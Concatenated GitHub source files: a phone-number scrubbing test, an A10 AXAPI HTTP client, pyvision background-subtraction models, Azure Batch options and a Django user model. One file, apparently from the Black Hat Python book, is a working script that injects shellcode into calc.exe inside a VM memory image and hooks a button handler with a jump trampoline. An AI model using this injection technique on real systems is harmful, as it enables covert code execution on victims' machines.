            '+86 135 3727 4136',
            '+61267881324',
        )
        self.check_phone_numbers(*international_formats)
    def test_multiple_phone_numbers(self):
        # running this through scrubadub.clean replaces 'reached at
        # 312.714.8142' with '{{EMAIL}}'. See issue
        expected = u'Call me on my cell {{PHONE}} or in my office {{PHONE}}'
        result = self.clean(
            u'Call me on my cell 312.714.8142 or in my office 773.415.7432'
        )
        self.assertEqual(
            result,
            expected,
            'problem with multiple phone numbers: \n %s' % result,
        )
| {
"content_hash": "07b9f612145f6de5c4b3cb8f62d7abb2",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 75,
"avg_line_length": 30.833333333333332,
"alnum_prop": 0.5410810810810811,
"repo_name": "datascopeanalytics/scrubadub",
"id": "44679082923e024843dab607e9bd1340db00e86a",
"size": "1850",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_detector_phone_numbers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57477"
},
{
"name": "Shell",
"bytes": "932"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import unicode_literals
import json
import logging
import time
from requests.adapters import HTTPAdapter
from requests import Session
import acos_client
from acos_client import logutils
from acos_client.v30 import responses as acos_responses
# Module-level logger for the AXAPI HTTP layer.
LOG = logging.getLogger(__name__)
# Canned replacement for a known-bad empty AXAPI reply body.
# NOTE(review): not referenced anywhere in this module chunk — confirm it
# is used elsewhere before removing.
broken_replies = {
    "": '{"response": {"status": "OK"}}'
}
class HttpClient(object):
    """HTTP(S) transport for the A10 ACOS AXAPI v3.0.

    Serializes request params to JSON, sends them with ``requests``,
    validates/normalizes the JSON response, and raises AXAPI-specific
    exceptions on failure. ``request`` adds a retry loop around
    ``request_impl`` for transient device-busy errors.
    """
    # Default per-request timeout, in seconds.
    AXAPI_DEFAULT_REQ_TIMEOUT = 300
    HEADERS = {
        "Content-type": "application/json",
        "User-Agent": "ACOS-Client-AGENT-%s" % acos_client.VERSION,
    }
    def __init__(self, host, port=None, protocol="https", max_retries=3,
                 timeout=AXAPI_DEFAULT_REQ_TIMEOUT):
        """Build the base URL; port defaults to 80/443 based on protocol."""
        if port is None:
            if protocol == 'http':
                self.port = 80
            else:
                self.port = 443
        else:
            self.port = port
        self.url_base = "%s://%s:%s" % (protocol, host, self.port)
        self.max_retries = max_retries
        self.timeout = timeout
    def dict_underscore_to_dash(self, my_dict):
        """Recursively replace '_' with '-' in dict keys (AXAPI key style).

        Lists are mapped element-wise; non-container values pass through.
        """
        if type(my_dict) is list:
            item_list = []
            for item in my_dict:
                item_list.append(self.dict_underscore_to_dash(item))
            return item_list
        elif type(my_dict) is dict:
            item_dict = {}
            for k, v in my_dict.items():
                item_dict[k.replace('_', '-')] = self.dict_underscore_to_dash(v)
            return item_dict
        else:
            return my_dict
    def request_impl(self, method, api_url, params={}, headers=None,
                     file_name=None, file_content=None, axapi_args=None,
                     max_retries=None, timeout=None, **kwargs):
        """Perform one HTTP request against the AXAPI and return parsed JSON.

        Raises ValueError if only one of file_name/file_content is given,
        and AXAPI-specific exceptions on 'fail'/auth responses. Non-JSON
        bodies are returned as text when the HTTP status is 200/204.
        """
        LOG.debug("axapi_http: full url = %s", self.url_base + api_url)
        LOG.debug("axapi_http: %s url = %s", method, api_url)
        LOG.debug("axapi_http: params = %s", json.dumps(logutils.clean(params), indent=4))
        valid_http_codes = [200, 204]
        # Update params with axapi_args for currently unsupported configuration of objects
        if axapi_args is not None:
            formatted_axapi_args = self.dict_underscore_to_dash(axapi_args)
            params = acos_client.v21.axapi_http.merge_dicts(params, formatted_axapi_args)
            LOG.debug("axapi_http: params + axapi_args = %s", json.dumps(logutils.clean(params), indent=4))
        # Set data" variable for the request
        if params:
            params_copy = params.copy()
            LOG.debug("axapi_http: params_all = %s", logutils.clean(params_copy))
            payload = json.dumps(params_copy)
        else:
            payload = None
        if (file_name is None and file_content is not None) or \
           (file_name is not None and file_content is None):
            raise ValueError("file_name and file_content must both be populated if one is")
        if not max_retries:
            max_retries = self.max_retries
        if not timeout:
            timeout = self.timeout
        # Set "headers" variable for the request
        request_headers = self.HEADERS.copy()
        if headers:
            request_headers.update(headers)
        LOG.debug("axapi_http: headers = %s", json.dumps(logutils.clean(request_headers), indent=4))
        # Process files if passed as a parameter
        if file_name is not None:
            # Multipart upload: requests sets its own Content-Type boundary,
            # so the JSON content-type header must be removed.
            files = {
                'file': (file_name, file_content, "application/octet-stream"),
                'json': ('blob', payload, "application/json")
            }
            request_headers.pop("Content-type", None)
            request_headers.pop("Content-Type", None)
        # Create session to set HTTPAdapter or SSLAdapter and set max_retries
        session = Session()
        if self.port == 443:
            session.mount('https://', HTTPAdapter(max_retries=max_retries))
        else:
            session.mount('http://', HTTPAdapter(max_retries=max_retries))
        # Resolve e.g. "GET" -> session.get
        session_request = getattr(session, method.lower())
        # Make actual request and handle any errors
        try:
            if file_name is not None:
                device_response = session_request(
                    self.url_base + api_url, verify=False, files=files, headers=request_headers, timeout=timeout
                )
            else:
                device_response = session_request(
                    self.url_base + api_url, verify=False, data=payload, headers=request_headers, timeout=timeout
                )
        except (Exception) as e:
            LOG.error("acos_client failing with error %s after %s retries", e.__class__.__name__, max_retries)
            raise e
        finally:
            session.close()
        # Validate json response
        try:
            json_response = device_response.json()
            LOG.debug("axapi_http: data = %s", json.dumps(logutils.clean(json_response), indent=4))
        except ValueError as e:
            # The response is not JSON but it still succeeded.
            if device_response.status_code in valid_http_codes:
                return device_response.text
            else:
                raise e
        # Handle "fail" responses returned by AXAPI
        if 'response' in json_response and 'status' in json_response['response']:
            if json_response['response']['status'] == 'fail':
                    acos_responses.raise_axapi_ex(json_response, method, api_url)
        # Handle "authorizationschema" responses returned by AXAPI
        if 'authorizationschema' in json_response:
            acos_responses.raise_axapi_auth_error(json_response, method, api_url, headers)
        return json_response
    def request(self, method, api_url, params={}, headers=None,
                file_name=None, file_content=None, axapi_args=None,
                max_retries=None, timeout=None, **kwargs):
        """Call request_impl, retrying once per second (up to at least 300s)
        while the device reports a transient 'busy' condition."""
        retry_timeout = 300
        if timeout and timeout > retry_timeout:
            retry_timeout = timeout
        start_time = time.time()
        loop = True
        while loop:
            try:
                return self.request_impl(method, api_url, params, headers,
                                         file_name=file_name, file_content=file_content,
                                         max_retries=max_retries,
                                         timeout=timeout, axapi_args=axapi_args,
                                         **kwargs)
            except acos_responses.axapi_retry_exceptions() as e:
                LOG.warning("ACOS device system is busy: %s", str(e))
                # Keep retrying until the retry window is exhausted.
                loop = ((time.time() - start_time) <= retry_timeout)
                if not loop:
                    raise e
                time.sleep(1)
            except (Exception) as e:
                raise e
    def get(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
        """Convenience wrapper for an HTTP GET through ``request``."""
        return self.request("GET", api_url, params, headers, max_retries=max_retries,
                            timeout=timeout, axapi_args=axapi_args, **kwargs)
    def post(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
        """Convenience wrapper for an HTTP POST through ``request``."""
        return self.request("POST", api_url, params, headers, max_retries=max_retries,
                            timeout=timeout, axapi_args=axapi_args, **kwargs)
    def put(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
        """Convenience wrapper for an HTTP PUT through ``request``."""
        return self.request("PUT", api_url, params, headers, max_retries=max_retries,
                            timeout=timeout, axapi_args=axapi_args, **kwargs)
    def delete(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
        """Convenience wrapper for an HTTP DELETE through ``request``."""
        return self.request("DELETE", api_url, params, headers, max_retries=max_retries,
                            timeout=timeout, axapi_args=axapi_args, **kwargs)
| {
"content_hash": "212a5f0c3aad3437ef2a79b937523bc4",
"timestamp": "",
"source": "github",
"line_count": 190,
"max_line_length": 114,
"avg_line_length": 41.61578947368421,
"alnum_prop": 0.5755659542177817,
"repo_name": "a10networks/acos-client",
"id": "382d09c8bedc35502a9bcb8065b64f3f2d5a37b6",
"size": "8530",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "acos_client/v30/axapi_http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "563101"
}
],
"symlink_target": ""
} |
'''
Created on Oct 22, 2010
@author: Stephen O'Hara
'''
# PyVision License
#
# Copyright (c) 2006-2008 Stephen O'Hara
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import scipy as sp
import pyvision as pv
import math
import cv
#Constants used to identify a background subtraction method,
# useful, for example, for specifying which method to use in the
# MotionDetector class. Each value is a self-describing string tag.
BG_SUBTRACT_FD = "BG_SUBTRACT_FD" #frame differencer
BG_SUBTRACT_MCFD = "BG_SUBTRACT_MCFD" #motion compensated frame differencer
BG_SUBTRACT_MF = "BG_SUBTRACT_MF" #median filter
BG_SUBTRACT_AMF = "BG_SUBTRACT_AMF" #approx median filter
class AbstractBGModel:
    '''
    Base class for background subtraction models. Subclasses provide a
    background-difference image via _computeBGDiff(); this class turns
    that difference into a foreground mask via hard or soft thresholding.
    '''
    def __init__(self, imageBuffer, thresh=20, soft_thresh=False):
        '''
        @param imageBuffer: An ImageBuffer object that has already been filled
        with the appropriate number of images. (Provide a full buffer...so a few
        frames of initialization will be required in most cases to fill up a
        newly created buffer.)
        @param thresh: A noise threshold to remove very small differences.
        @param soft_thresh: If True, getForegroundMask returns soft weights
        instead of a binary mask.
        '''
        self._imageBuffer = imageBuffer
        self._threshold = thresh
        self._softThreshold = soft_thresh
    def _computeBGDiff(self):
        '''
        This private method should be overridden by a concrete background subtraction
        class to yield a difference image from the background model.
        '''
        # Fix: the original 'raise NotImplemented' raised a TypeError, because
        # NotImplemented is a sentinel value, not an exception class.
        # NotImplementedError is the correct abstract-method signal.
        raise NotImplementedError
    def getForegroundMask(self):
        '''
        @return: A mask image indicating which pixels are considered foreground.
        Depending on whether soft-thresholding is used, this may be a binary image
        with values of [0 or 255], or image of weights [0.0-255.0], which will
        have to be divided by 255 to get weights [0.0-1.0].
        @note: One may wish to perform additional morphological operations
        on the foreground mask prior to use.
        '''
        diff = self._computeBGDiff()
        if self._softThreshold:
            # Soft weights: exponential saturation of |diff| relative to threshold.
            mask = 1 - (math.e)**(-(1.0*diff)/self._threshold) #element-wise exp weighting
        else:
            # Hard binary mask: absolute difference above the noise threshold.
            mask = (sp.absolute(diff) > self._threshold)
        return pv.Image(mask*255.0)
class FrameDifferencer(AbstractBGModel):
    '''
    Simple N-frame differencing background model for a stationary camera.
    The buffer's middle frame is differenced against both the oldest and
    the newest frame; a pixel is foreground only if it differs from both,
    i.e. the output is the intersection abs(Middle-First) AND abs(Last-Middle).
    '''
    def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
        AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
    def _computeBGDiff(self):
        '''Difference the middle frame against the first and last frames.'''
        first = self._imageBuffer[0].asMatrix2D()
        middle = self._imageBuffer.getMiddle().asMatrix2D()
        last = self._imageBuffer[-1].asMatrix2D()
        diff_backward = sp.absolute(middle - first)   #frame diff vs oldest
        diff_forward = sp.absolute(last - middle)     #frame diff vs newest
        # Element-wise minimum of the two difference images: this is what
        # gets compared to the threshold to yield the foreground mask.
        return sp.minimum(diff_backward, diff_forward)
class MotionCompensatedFrameDifferencer(AbstractBGModel):
    '''
    This class represents a more sophisticated frame differencing
    algorithm that takes into account potential camera motion, and
    applies a registration method to align subsequent images prior
    to frame subtraction.
    '''
    def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
        AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
        self._flow = pv.OpticalFlow()
        if imageBuffer.isFull():
            self._initFlow()  # if a non-full buffer is given, then we
                              # must assume the caller will perform
                              # flow initiation when appropriate.
    def _initFlow(self):
        '''
        Should be called after buffer is full to compute the optical flow
        information on the buffered frames. Only needs to be called once,
        prior to first call of _computeBGDiff(), because from then on,
        the flow will be updated as new frames are added to the buffer.
        '''
        for i in range( len(self._imageBuffer)):
            self._flow.update( self._imageBuffer[i])
    def getOpticalFlow(self):
        '''
        @return: A handle to the pv.OpticalFlow object being used by this object.
        '''
        return self._flow
    def setOpticalFlow(self, OF_Object):
        '''
        This is an optional method that allows the user to provide an
        optical flow object (pv.OpticalFlow) with non-default settings.
        @param OF_Object: The optical flow object desired for use in computing the
        motion compensated frame difference.
        '''
        self._flow = OF_Object
    def _computeBGDiff(self):
        '''
        Warp the first and last buffered frames into the middle frame's
        coordinate system using composed optical-flow transforms, then
        frame-difference as in FrameDifferencer. Warped-in border regions
        are masked out of the result.
        NOTE(review): relies on Python 2 integer division for n/2; under
        Python 3 these would need to become n//2 — confirm before porting.
        '''
        self._flow.update( self._imageBuffer.getLast() )
        n = len(self._imageBuffer)
        prev_im = self._imageBuffer[0]
        # Compose the forward transforms from the first frame up to the middle.
        forward = None
        for i in range(0,n/2):
            if forward == None:
                forward = self._imageBuffer[i].to_next
            else:
                forward = forward * self._imageBuffer[i].to_next
        w,h = size = prev_im.size
        # Validity mask: 255 in the interior, 0 on a 2-pixel border, so that
        # pixels warped in from outside the frame are ignored.
        mask = cv.CreateImage(size,cv.IPL_DEPTH_8U,1)
        cv.Set(mask,0)
        interior = cv.GetSubRect(mask, pv.Rect(2,2,w-4,h-4).asOpenCV())
        cv.Set(interior,255)
        mask = pv.Image(mask)
        prev_im = forward(prev_im)
        prev_mask = forward(mask)
        next_im = self._imageBuffer[n-1]
        # Compose the backward transforms from the last frame down to the middle.
        back = None
        for i in range(n-1,n/2,-1):
            if back == None:
                back = self._imageBuffer[i].to_prev
            else:
                back = back * self._imageBuffer[i].to_prev
        next_im = back(next_im)
        next_mask = back(mask)
        curr_im = self._imageBuffer[n/2]
        prevImg = prev_im.asMatrix2D()
        curImg = curr_im.asMatrix2D()
        nextImg = next_im.asMatrix2D()
        prevMask = prev_mask.asMatrix2D()
        nextMask = next_mask.asMatrix2D()
        # Compute transformed images
        delta1 = sp.absolute(curImg - prevImg) #frame diff 1
        delta2 = sp.absolute(nextImg - curImg) #frame diff 2
        # Zero out differences wherever the warped validity mask is zero.
        delta1 = sp.minimum(delta1,prevMask)
        delta2 = sp.minimum(delta2,nextMask)
        #use element-wise minimum of the two difference images, which is what
        # gets compared to threshold to yield foreground mask
        return sp.minimum(delta1, delta2)
class MedianFilter(AbstractBGModel):
    '''
    Background model that estimates the background as the per-pixel
    median over all frames currently held in the image buffer.
    '''
    def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
        AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
    def _getMedianVals(self):
        '''
        @return: A scipy matrix representing the gray-scale median values of the image stack.
        If you want a pyvision image, just wrap the result in pv.Image(result).
        '''
        # Cache the stacked gray-scale frames for reuse/inspection.
        self._imageStack = self._imageBuffer.asStackBW()
        return sp.median(self._imageStack, axis=0)  #median of each pixel jet in stack
    def _computeBGDiff(self):
        '''Difference of the newest frame against the median background.'''
        newest = self._imageBuffer.getLast().asMatrix2D()
        background = self._getMedianVals()
        return (newest - background)
class ApproximateMedianFilter(MedianFilter):
    '''
    Incremental approximation of the median background model. The median
    image is seeded from the full initial buffer, and thereafter each pixel
    is nudged by +/-1 toward the corresponding pixel of the newest frame,
    converging toward the true median over time.
    '''
    def __init__(self, imageBuffer, thresh=20, soft_thresh=False):
        # The seed median requires a complete stack of frames.
        if not imageBuffer.isFull():
            raise ValueError("Image Buffer must be full before initializing Approx. Median Filter.")
        MedianFilter.__init__(self, imageBuffer, thresh, soft_thresh)
        self._medians = self._getMedianVals()
    def _updateMedian(self):
        '''Step each median pixel one unit toward the newest frame.'''
        newest = self._imageBuffer.getLast().asMatrix2D()
        current_median = self._medians
        step_up = (newest > current_median)*1.0
        step_down = (newest < current_median)*1.0
        self._medians = current_median + step_up - step_down
    def _computeBGDiff(self):
        '''Update the running median, then difference the newest frame against it.'''
        self._updateMedian()
        newest = self._imageBuffer.getLast().asMatrix2D()
        return (newest - self._medians)
| {
"content_hash": "88e950567ed1151ca03174f5251d9144",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 100,
"avg_line_length": 40.357142857142854,
"alnum_prop": 0.6435957149510946,
"repo_name": "mikeseven/pyvision",
"id": "7f4c65157ef059c30fcb43c72242d41c89874ad3",
"size": "10735",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "src/pyvision/surveillance/BackgroundSubtraction.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1379814"
},
{
"name": "R",
"bytes": "1487"
},
{
"name": "Shell",
"bytes": "166"
}
],
"symlink_target": ""
} |
from akagi.content import Content
from akagi.iterator import Iterator
class LocalFileContent(Content):
    """Content backed by a file on the local filesystem."""
    # Flag distinguishing local files from remote content sources.
    is_local = True
    def __init__(self, path, file_format='csv'):
        self.path = path
        self.file_format = file_format
        # Resolve the format-specific iterator implementation up front.
        self.iterator_class = Iterator.get_iterator_class(self.file_format)
    def __iter__(self):
        """Iterate records by delegating to the format-specific iterator."""
        return self.iterator_class(self)
    @property
    def key(self):
        """The file path doubles as this content's identity key."""
        return self.path
    @property
    def _body(self):
        """Open and return a fresh binary handle on the underlying file."""
        return open(self.path, 'rb')
| {
"content_hash": "0d43f0132dff70e5ed9be0388bf04df0",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 70,
"avg_line_length": 23.09090909090909,
"alnum_prop": 0.6358267716535433,
"repo_name": "ayemos/osho",
"id": "08e39389f57063d6893b64655595acf92ef2c52d",
"size": "508",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "akagi/contents/local_file_content.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2283"
},
{
"name": "Python",
"bytes": "21652"
}
],
"symlink_target": ""
} |
import sys
import struct

# Virtual address to patch with the trampoline. Per the variable name this is
# presumably the handler behind calc.exe's "=" button -- TODO confirm against
# the target binary's disassembly.
equals_button = 0x01005D51
memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"
# Filled in once a suitable location / patch point has been found.
slack_space = None
trampoline_offset = None
# read in our shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
sys.path.append("/Downloads/volatility-2.3.1")

# NOTE: the import / registry / config statements below are deliberately
# interleaved -- volatility's option registration expects this order.
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "Win2003SP2x86"
config.LOCATION = "file://%s" % memory_file

import volatility.plugins.taskmods as taskmods

# Walk the process list, looking for the target process.
p = taskmods.PSList(config)
for process in p.calculate():
    if str(process.ImageFileName) == "calc.exe":
        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
        print "[*] Hunting for physical offsets...please wait."
        address_space = process.get_process_address_space()
        pages = address_space.get_available_pages()
        # For each mapped page we need two things: (1) a NUL-filled region
        # ("slack space") big enough for the shellcode, and (2) the page that
        # contains equals_button so the trampoline can be written there.
        for page in pages:
            physical = address_space.vtop(page[0])
            if physical is not None:
                if slack_space is None:
                    fd = open(memory_file,"r+")
                    fd.seek(physical)
                    buf = fd.read(page[1])
                    try:
                        # Look for a run of NUL bytes long enough to hold sc.
                        offset = buf.index("\x00" * len(sc))
                        slack_space = page[0] + offset
                        print "[*] Found good shellcode location!"
                        print "[*] Virtual address: 0x%08x" % slack_space
                        print "[*] Physical address: 0x%08x" % (physical + offset)
                        print "[*] Injecting shellcode."
                        fd.seek(physical + offset)
                        fd.write(sc)
                        fd.flush()
                        # create our trampoline
                        tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)  # mov ebx, <shellcode VA>
                        tramp += "\xff\xe3"                                     # jmp ebx
                        if trampoline_offset is not None:
                            break
                    except:
                        # NOTE(review): bare except silently skips pages with
                        # no large-enough NUL run (and masks any read error).
                        pass
                    fd.close()
                # check for our target code location
                if page[0] <= equals_button and equals_button < ((page[0] + page[1])-7):
                    # calculate virtual offset
                    v_offset = equals_button - page[0]
                    # now calculate physical offset
                    trampoline_offset = physical + v_offset
                    print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
                    if slack_space is not None:
                        break

# NOTE(review): if either search failed, `trampoline_offset` is None (seek
# raises TypeError) or `tramp` is unbound (NameError) -- the script assumes
# both were found.
print "[*] Writing trampoline..."
fd = open(memory_file, "r+")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()
print "[*] Done injecting code."
| {
"content_hash": "a8472fd3c741aa34216537fb0b639bc8",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 160,
"avg_line_length": 33.0462962962963,
"alnum_prop": 0.4858503782572149,
"repo_name": "vdrey/Toolbox",
"id": "69d162f2eaeabe51fa6233fb83f4d61871cd5b41",
"size": "3569",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/BHP/BHP-Code/BHP-Code/Chapter11/code_inject.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1004"
},
{
"name": "HTML",
"bytes": "317"
},
{
"name": "Python",
"bytes": "372332"
}
],
"symlink_target": ""
} |
from django_cas_ng.backends import * # noqa
from django_cas_ng.decorators import * # noqa
from django_cas_ng.middleware import * # noqa
from django_cas_ng.models import * # noqa
from django_cas_ng.views import * # noqa
def test_nothing_is_on_fire():
    """Smoke test: passes as long as the module-level star-imports resolved."""
    return None
| {
"content_hash": "52b0948a878899e5315f6f6e8d2606fb",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 69,
"avg_line_length": 33.6,
"alnum_prop": 0.7142857142857143,
"repo_name": "mingchen/django-cas-ng",
"id": "64ed5ba487975028087698ea42c6cb99562ccd59",
"size": "336",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_smoke.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "373"
},
{
"name": "Python",
"bytes": "80167"
}
],
"symlink_target": ""
} |
import logging
from fuel_health import nmanager
# Module-level logger named after this module.
LOG = logging.getLogger(__name__)
class SanityHeatTest(nmanager.SanityChecksTest):
    """Class contains tests that check basic Heat functionality.
    Special requirements:
    1. Heat component should be installed.
    """
    def test_list_stacks(self):
        """Request stack list
        Target component: Heat
        Scenario:
        1. Request the list of stacks.
        Duration: 20 s.
        """
        # NOTE(review): OSTF test docstrings are user-facing (parsed for the
        # test description), so they are left byte-for-byte unchanged.
        # verify() runs self._list_stacks(self.heat_client) as scenario step 1,
        # reporting 'Stack list is unavailable. ' on failure; the 20 is
        # presumably the allowed duration in seconds -- confirm in nmanager.
        self.verify(20, self._list_stacks, 1,
                    'Stack list is unavailable. ',
                    "stack listing",
                    self.heat_client)
| {
"content_hash": "51efc0da65b601029d933c7df5c3db4f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 24.846153846153847,
"alnum_prop": 0.586687306501548,
"repo_name": "mcloudv/fuel-ostf",
"id": "9afcb162f421d7deba03c1fd7847bcbc117d1925",
"size": "1266",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fuel_health/tests/sanity/test_sanity_heat.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "404"
},
{
"name": "Python",
"bytes": "594650"
},
{
"name": "Shell",
"bytes": "6024"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class JobEnableOptions(Model):
    """Additional parameters for enable operation.

    :param timeout: The maximum time that the server can spend processing the
     request, in seconds. The default is 30 seconds. Default value: 30 .
    :type timeout: int
    :param client_request_id: The caller-generated request identity, in the
     form of a GUID with no decoration such as curly braces, e.g.
     9C4D50EE-2D56-4CD3-8152-34347DC9F2B0.
    :type client_request_id: str
    :param return_client_request_id: Whether the server should return the
     client-request-id in the response. Default value: False .
    :type return_client_request_id: bool
    :param ocp_date: The time the request was issued. Client libraries
     typically set this to the current system clock time; set it explicitly if
     you are calling the REST API directly.
    :type ocp_date: datetime
    :param if_match: An ETag value associated with the version of the resource
     known to the client. The operation will be performed only if the
     resource's current ETag on the service exactly matches the value
     specified by the client.
    :type if_match: str
    :param if_none_match: An ETag value associated with the version of the
     resource known to the client. The operation will be performed only if the
     resource's current ETag on the service does not match the value specified
     by the client.
    :type if_none_match: str
    :param if_modified_since: A timestamp indicating the last modified time of
     the resource known to the client. The operation will be performed only if
     the resource on the service has been modified since the specified time.
    :type if_modified_since: datetime
    :param if_unmodified_since: A timestamp indicating the last modified time
     of the resource known to the client. The operation will be performed only
     if the resource on the service has not been modified since the specified
     time.
    :type if_unmodified_since: datetime
    """

    def __init__(self, timeout=30, client_request_id=None, return_client_request_id=False, ocp_date=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None):
        # Expose every option as a same-named instance attribute.
        options = (
            ("timeout", timeout),
            ("client_request_id", client_request_id),
            ("return_client_request_id", return_client_request_id),
            ("ocp_date", ocp_date),
            ("if_match", if_match),
            ("if_none_match", if_none_match),
            ("if_modified_since", if_modified_since),
            ("if_unmodified_since", if_unmodified_since),
        )
        for attr_name, attr_value in options:
            setattr(self, attr_name, attr_value)
| {
"content_hash": "444da5de0ce04c82def82ad6fef15c06",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 191,
"avg_line_length": 51.88,
"alnum_prop": 0.723207401696222,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "52157c07bc41e3d84ab0771074c59944eef072b9",
"size": "3068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-batch/azure/batch/models/job_enable_options.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
class UserManager(BaseUserManager):
    """Manager for the custom ``User`` model keyed on a yiban id."""

    def create_user(self, yiban_id, password):
        """Create and save a regular user.

        Raises:
            ValueError: if *yiban_id* is empty.
        """
        if not yiban_id:
            raise ValueError("易班id不能为空")
        # BUG FIX: the model field is named ``yiban_id``; the previous
        # ``login_id=yiban_id`` keyword does not exist on the model, so
        # every call raised TypeError.
        user = self.model(
            yiban_id=yiban_id,
        )
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, yiban_id, password):
        """Create and save an admin (``is_admin=True``) user."""
        # BUG FIX: ``create_user`` requires the ``password`` argument; it was
        # previously omitted, which raised TypeError before any user was
        # created. Passing it here also removes the need for the redundant
        # second ``set_password`` call.
        user = self.create_user(
            yiban_id=yiban_id,
            password=password,
        )
        user.is_admin = True
        user.save(using=self._db)
        return user
class User(AbstractBaseUser):
    """Custom user identified by an external yiban account id (dev use)."""
    class Meta:
        verbose_name = '用户(开发用)'
        verbose_name_plural = '用户(开发用)'
    # Single-character codes stored in the ``sex`` column.
    MALE = "M"
    FEMALE = "F"
    UNKNOWN = 'U'
    SEX_CHOICES = (
        (FEMALE, "女"),
        (MALE, "男"),
        (UNKNOWN, "保密")
    )
    # Unique external identifier; doubles as the login name (USERNAME_FIELD).
    yiban_id = models.CharField(max_length=100, unique=True, verbose_name='易班id', null=False)
    nickname = models.CharField(max_length=16, verbose_name='昵称')
    sex = models.CharField(max_length=1, choices=SEX_CHOICES, default=UNKNOWN, verbose_name='性别')
    is_admin = models.BooleanField(default=False, verbose_name='管理员')
    USERNAME_FIELD = 'yiban_id'
    objects = UserManager()
    def get_full_name(self):
        # Both the full and the short name fall back to the nickname.
        return self.nickname
    def get_short_name(self):
        return self.nickname
    def __str__(self):
        return self.nickname
    def as_dict(self):
        # Serializable subset of the profile (no password hash, no admin flag).
        return dict(yiban_id=self.yiban_id, nickname=self.nickname, sex=self.sex)
    @property
    def is_authenticated(self):
        # Returns a callable so that both ``user.is_authenticated`` (truthy
        # object) and legacy ``user.is_authenticated()`` (returns True) read
        # as authenticated.
        return lambda: True
| {
"content_hash": "f580830ae526d4dc55748e7e3af76dae",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 97,
"avg_line_length": 25.84375,
